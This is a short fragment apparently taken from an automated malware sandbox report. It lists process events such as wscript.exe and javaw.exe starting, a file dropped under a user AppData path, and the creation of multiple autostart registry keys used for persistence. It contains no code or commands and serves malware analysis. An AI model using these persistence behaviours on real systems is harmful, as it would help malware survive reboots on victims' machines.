21->44         started        86 C:\Users\user\AppData\...\rnmbjgzzvs.txt, Zip 24->86 dropped 130 Creates autostart registry keys to launch java 24->130 132 Creates multiple autostart registry keys 24->132 46 wscript.exe 2 13 24->46         started        49 javaw.exe